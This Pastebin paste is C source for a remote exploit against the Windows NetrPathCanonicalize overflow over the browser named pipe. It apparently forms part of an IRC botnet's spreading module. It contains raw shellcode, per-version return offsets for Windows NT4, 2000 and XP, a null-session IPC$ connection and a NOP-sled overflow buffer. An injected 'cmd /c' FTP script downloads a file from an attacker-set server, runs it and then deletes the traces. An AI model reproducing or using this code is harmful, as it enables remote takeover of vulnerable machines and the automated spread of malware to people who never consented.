Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include "../includes.h"
- #include "../Base/b_functions.h"
- #include <time.h>
- #include <math.h>
- #pragma comment( lib, "mpr.lib" )
- // consts
- #define MAX_FRAG_SIZE ( 4280 )
- #define PATH_SIZE ( 1064 )
- #define MAX_TRIES ( 3 )
- #define TRY_TIMEOUT ( 2000 )
- /* use:
- - EXITFUNC: thread
- - max size: 370
- - bad chars: 0x00 0x0a 0x0d 0x5c 0x5f 0x2f 0x2e
- */
- char execute[] =
- "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"
- "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99"
- "\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04"
- "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb"
- "\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30"
- "\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09"
- "\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\xeb\x0d"
- "\x68\xef\xce\xe0\x60\x68\x98\xfe\x8a\x0e\x57\xff\xe7\xe8\xee\xff"
- "\xff\xff"; // 130 bytes 0x82
- unsigned char stack[] = "\x81\xc4\xff\xef\xff\xff\x44"; // sub esp, 4097
- // targetz
- typedef struct
- {
- const char *pszName;
- size_t nPathLen;
- size_t nOffsetStartAddr;
- size_t nShellCodeAddr;
- bool bIsWinXP;
- } Target;
- Target Targetz[] =
- {
- { "Windows NT4, 2000 (SP0-SP4)",1066, 1000, 600, false },
- { "Windows XP (SP0+SP1)", 710, 612, 0, true },
- };
- unsigned long nOffset1 = 0x00020804; // Win2k + WinXP SP1
- unsigned long nOffset2 = nOffset1 + 6; // WinXP SP0
- // -----------------------------
- #pragma pack( 1 )
- typedef unsigned char UINT8;
- typedef unsigned short UINT16;
- //typedef unsigned long UINT32;
- typedef struct
- {
- UINT32 maxlength;
- UINT32 offset;
- UINT32 length;
- } UNISTR2;
- typedef struct
- {
- UINT8 versionmaj;
- UINT8 versionmin;
- UINT8 type;
- UINT8 flags;
- UINT32 representation;
- UINT16 fraglength;
- UINT16 authlength;
- UINT32 callid;
- } RPC_Header;
- typedef struct
- {
- UINT8 byte[16];
- UINT32 version;
- } RPC_Iface;
- typedef struct
- {
- RPC_Header NormalHeader;
- UINT16 maxtsize;
- UINT16 maxrsize;
- UINT32 assocgid;
- UINT32 numelements;
- UINT16 contextid;
- UINT8 numsyntaxes;
- UINT8 align;
- RPC_Iface Interface1;
- RPC_Iface Interface2;
- } RPC_ReqBind;
- typedef struct
- {
- RPC_Header NormalHeader;
- UINT32 allochint;
- UINT16 prescontext;
- UINT16 opnum;
- } RPC_ReqNorm;
- typedef struct
- {
- UINT32 ReferendID;
- UNISTR2 Server;
- wchar_t Server_Data;
- char align[ 2 ];
- } NetrPathCanonicalize_Start;
- typedef struct
- {
- UINT32 OutBufLen;
- UNISTR2 Prefix;
- wchar_t Prefix_Data[ 2 ];
- UINT32 Type;
- UINT32 Flags;
- } NetrPathCanonicalize_End;
- #pragma pack()
- // -----------------------------
- ////////////////////////////////////////////////////////////////
- bool SendReqPacket_Part( HANDLE hPipe, RPC_ReqNorm pPacketHeader, unsigned char *pStubData, size_t nDataLen, UINT16 nMaxSize, bool bFirst )
- {
- bool bSendNext;
- unsigned char *pPacket;
- DWORD nBytesWritten;
- // first fragment
- if( bFirst )
- pPacketHeader.NormalHeader.flags |= 1; // first fragment
- else
- pPacketHeader.NormalHeader.flags &= ~1; // not first fragment
- if( ( nDataLen + sizeof( RPC_ReqNorm ) ) <= nMaxSize )
- {
- // last
- pPacketHeader.NormalHeader.fraglength = (UINT16)( nDataLen + sizeof( RPC_ReqNorm ) );
- pPacketHeader.allochint = (UINT32)nDataLen;
- pPacketHeader.NormalHeader.flags |= 2; // last fragment
- bSendNext = false;
- }
- else
- {
- // not last fragment
- pPacketHeader.NormalHeader.fraglength = (UINT16)nMaxSize;
- pPacketHeader.allochint = nMaxSize - sizeof( RPC_ReqNorm );
- pPacketHeader.NormalHeader.flags &= ~2; // not last fragment
- bSendNext = true;
- }
- // alloc packet
- pPacket = (unsigned char*)malloc( pPacketHeader.NormalHeader.fraglength );
- if( !pPacket )
- return false;
- // make packet
- *(RPC_ReqNorm*)pPacket = pPacketHeader; // copy header
- memcpy( &pPacket[ sizeof( RPC_ReqNorm ) ], pStubData, pPacketHeader.allochint ); // add stub data
- // send
- if( !WriteFile( hPipe, pPacket, pPacketHeader.NormalHeader.fraglength, &nBytesWritten, NULL ) ||
- nBytesWritten != pPacketHeader.NormalHeader.fraglength )
- {
- free( pPacket );
- return false;
- }
- free( pPacket );
- // send remaining
- if( bSendNext )
- return SendReqPacket_Part( hPipe, pPacketHeader, pStubData + pPacketHeader.allochint, nDataLen - pPacketHeader.allochint, nMaxSize, false );
- else
- return true;
- }
- BOOL netapi(char *target, void* conn,EXINFO exinfo)
- {
- char *pszTarget;
- char szIPC[ 8192 ];
- char szPipe[ 8192 ];
- char szShellBuf[370];
- unsigned char RecvBuff[ 8192 ];
- unsigned char *pPath;
- unsigned char *pPacket;
- int nTarget;
- NETRESOURCE NetSource;
- DWORD nNullSessionError;
- HANDLE hPipe;
- RPC_ReqBind BindPacket;
- DWORD nBytesWritten;
- DWORD nBytesRead;
- NetrPathCanonicalize_Start PStart;
- NetrPathCanonicalize_End PEnd;
- size_t nPathLen;
- size_t nBufferPos;
- size_t nPacketSize;
- RPC_ReqNorm ReqNormalHeader;
- bool bExit;
- int nCount;
- OVERLAPPED ov;
- IRC* irc=(IRC*)conn;
- // Set Correct offset
- nTarget = 1;
- int iHostOS=FpHost(exinfo.ip, FP_SMB);
- if(iHostOS==OS_WIN2K || OS_WINNT){
- nTarget = 0;
- }
- pszTarget = exinfo.ip;
- // Setup execshell
- // char fname[_MAX_FNAME];
- char szTempbuf[ 512 ];
- memcpy(szTempbuf, execute, sizeof(szTempbuf));
- // sprintf(fname,"s_%d%d%d%d%d.exe",rand()%9,rand()%9,rand()%9,rand()%9,rand()%9);
- DWORD nCmdLen = _snprintf( szTempbuf + sizeof( execute ) - 1, sizeof( szTempbuf ),
- "cmd /c echo open %s %s > n&echo user %s %s >> n &echo get %s >> n &echo quit >> n &ftp -n -s:n &%s&del n\r\n",
- ftpip,ftpport,ftplogin,ftppass,ftpfilename,ftpfilename);
- int iShellSize = EncodeRNS0(szShellBuf, sizeof(szShellBuf), szTempbuf, sizeof( execute ) + nCmdLen); // sizeof( exec_Shellcode ) - 1 + nCmdLen + 1 == x - 1 + y + 1; -1 + 1 = 0
- if( !iShellSize )
- return FALSE;
- // Create NullSession
- if( _stricmp( pszTarget, "." ) )
- {
- _snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget ); // change this to another pipe.... ;) -xd
- memset( &NetSource, 0 ,sizeof( NetSource ) );
- NetSource.lpRemoteName = szIPC;
- nNullSessionError = WNetAddConnection2( &NetSource, "", "", 0 );
- }
- // Connect to pipe
- _snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\browser", pszTarget );
- hPipe = CreateFile( szPipe,
- GENERIC_WRITE | GENERIC_READ,
- FILE_SHARE_READ | FILE_SHARE_WRITE,
- NULL,
- OPEN_EXISTING,
- FILE_FLAG_OVERLAPPED,
- NULL );
- if( hPipe == INVALID_HANDLE_VALUE )
- {
- return 1;
- }
- // Bind packet
- memset( &BindPacket, 0, sizeof( BindPacket ) );
- BindPacket.NormalHeader.versionmaj = 5;
- BindPacket.NormalHeader.versionmin = 0;
- BindPacket.NormalHeader.type = 11; // bind
- BindPacket.NormalHeader.flags = 3; // first + last fragment
- BindPacket.NormalHeader.representation = 0x00000010; // little endian
- BindPacket.NormalHeader.fraglength = sizeof( BindPacket );
- BindPacket.NormalHeader.authlength = 0;
- BindPacket.NormalHeader.callid = 0;
- BindPacket.maxtsize = MAX_FRAG_SIZE;
- BindPacket.maxrsize = MAX_FRAG_SIZE;
- BindPacket.assocgid = 0;
- BindPacket.numelements = 1;
- BindPacket.contextid = 0;
- BindPacket.numsyntaxes = 1;
- memcpy( BindPacket.Interface1.byte, "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88", 16 );
- BindPacket.Interface1.version = 3;
- memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );
- BindPacket.Interface2.version = 2;
- // Send
- if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
- {
- CloseHandle( hPipe );
- return 1;
- }
- ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, NULL ); // dummy receive
- // Generate bad packet
- srand( (int)time( NULL ) );
- // Build packet parts
- memset( &PStart, 0x41, sizeof( PStart ) );
- memset( &PEnd, 0x41, sizeof( PEnd ) );
- // Start
- PStart.ReferendID = rand();
- PStart.Server.length = 1;
- PStart.Server.offset = 0;
- PStart.Server.maxlength = 1;
- PStart.Server_Data = L'';
- // End
- if( Targetz[ nTarget ].bIsWinXP )
- {
- // WinXP
- PEnd.Prefix.length = 1;
- PEnd.Prefix.offset = 0;
- PEnd.Prefix.maxlength = 1;
- memcpy( PEnd.Prefix_Data, "\x00\x00\x00\x00", 4 );
- }
- else
- {
- // Win2k
- PEnd.Prefix.length = 2;
- PEnd.Prefix.offset = 0;
- PEnd.Prefix.maxlength = 2;
- memcpy( PEnd.Prefix_Data, "\xeb\x02\x00\x00", 4 );
- }
- PEnd.OutBufLen = rand() % 250 + 1;
- PEnd.Type = rand() % 250 + 1;;
- PEnd.Flags = 0;
- // BadPath
- nPathLen = Targetz[ nTarget ].nPathLen;
- pPath = (unsigned char*)malloc( nPathLen );
- if( !pPath )
- {
- CloseHandle( hPipe );
- return 1;
- }
- // Nop
- memset( pPath, 0x90, nPathLen - 2 );
- // Null termination
- memset( pPath + nPathLen - 2, 0, 2 );
- // Stack
- nBufferPos = Targetz[ nTarget ].nShellCodeAddr;
- memcpy( pPath + nBufferPos, stack, sizeof( stack ) - 1 );
- nBufferPos += sizeof( stack ) - 1;
- // Shellcode
- memcpy( pPath + nBufferPos, szShellBuf, iShellSize);
- nBufferPos += iShellSize;
- // Offsets
- nBufferPos = Targetz[ nTarget ].nOffsetStartAddr;
- if( Targetz[ nTarget ].bIsWinXP )
- {
- // Win XP
- // - SP0
- memcpy( pPath + nBufferPos, &nOffset2, sizeof( nOffset1 ) );
- nBufferPos += 4;
- // - padding
- nBufferPos += 8;
- // - SP0
- memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
- nBufferPos += 4;
- // - padding
- nBufferPos += 32;
- // - SP1
- memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
- nBufferPos += 4;
- // - padding
- nBufferPos += 8;
- // - SP1
- memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
- nBufferPos += 4;
- // - padding
- nBufferPos += 32;
- nBufferPos += sizeof( wchar_t );
- }
- else
- {
- //
- // Win2k
- //
- for( size_t n = 0; n < 16; n++ )
- memcpy( pPath + nBufferPos + ( n * sizeof( nOffset1 ) ), &nOffset1, sizeof( nOffset1 ) );
- }
- // Add them up
- nPacketSize =
- sizeof( PStart )
- + sizeof( UNISTR2 )
- + nPathLen + sizeof( wchar_t ) + /* for maybe an align -> */4
- + sizeof( NetrPathCanonicalize_End );
- pPacket = (unsigned char*)malloc( nPacketSize );
- if( !pPacket )
- {
- CloseHandle( hPipe );
- free( pPath );
- return 1;
- }
- memset( pPacket, 0, nPacketSize );
- nBufferPos = 0;
- memcpy( pPacket, &PStart, sizeof( PStart ) );
- nBufferPos += sizeof( NetrPathCanonicalize_Start );
- ( (UNISTR2*)( pPacket + nBufferPos ) )->length = (UINT32)ceil( (float)nPathLen / sizeof( wchar_t ) );
- ( (UNISTR2*)( pPacket + nBufferPos ) )->offset = 0;
- ( (UNISTR2*)( pPacket + nBufferPos ) )->maxlength = ( (UNISTR2*)( pPacket + nBufferPos ) )->length;
- nBufferPos += sizeof( UNISTR2 );
- memcpy( pPacket + nBufferPos, pPath, nPathLen );
- nBufferPos += nPathLen;
- // Align
- while( nBufferPos % 4 )
- nBufferPos++;
- // ---
- memcpy( pPacket + nBufferPos, &PEnd, sizeof( PEnd ) );
- nBufferPos += sizeof( PEnd );
- // ---
- free( pPath ); // clean up
- // Generate send header
- memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
- ReqNormalHeader.NormalHeader.versionmaj = 5;
- ReqNormalHeader.NormalHeader.versionmin = 0;
- ReqNormalHeader.NormalHeader.type = 0; // request
- ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment
- ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian
- ReqNormalHeader.NormalHeader.authlength = 0;
- ReqNormalHeader.NormalHeader.callid = 0;
- ReqNormalHeader.prescontext = 0;
- ReqNormalHeader.opnum = 0x1f;
- // =====================
- // Send and check response
- memset( &ov, 0, sizeof( ov ) );
- ov.hEvent = CreateEvent( NULL, TRUE, FALSE, NULL );
- bExit = false;
- nCount = 0;
- while( !bExit && nCount < MAX_TRIES )
- {
- nCount++;
- // Send request
- if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nBufferPos, MAX_FRAG_SIZE, true ) )
- break;
- // Check response
- if( ov.hEvent )
- {
- if( !ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, &ov ) && GetLastError() != ERROR_IO_PENDING )
- return FALSE;
- else
- {
- if( WaitForSingleObject( ov.hEvent, TRY_TIMEOUT ) == WAIT_TIMEOUT )
- {
- bExit = true;
- }
- }
- }
- }
- // Clean up
- CloseHandle( hPipe );
- free( pPacket );
- if( ov.hEvent )
- CloseHandle( ov.hEvent );
- if (bExit)
- return TRUE;
- return FALSE;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement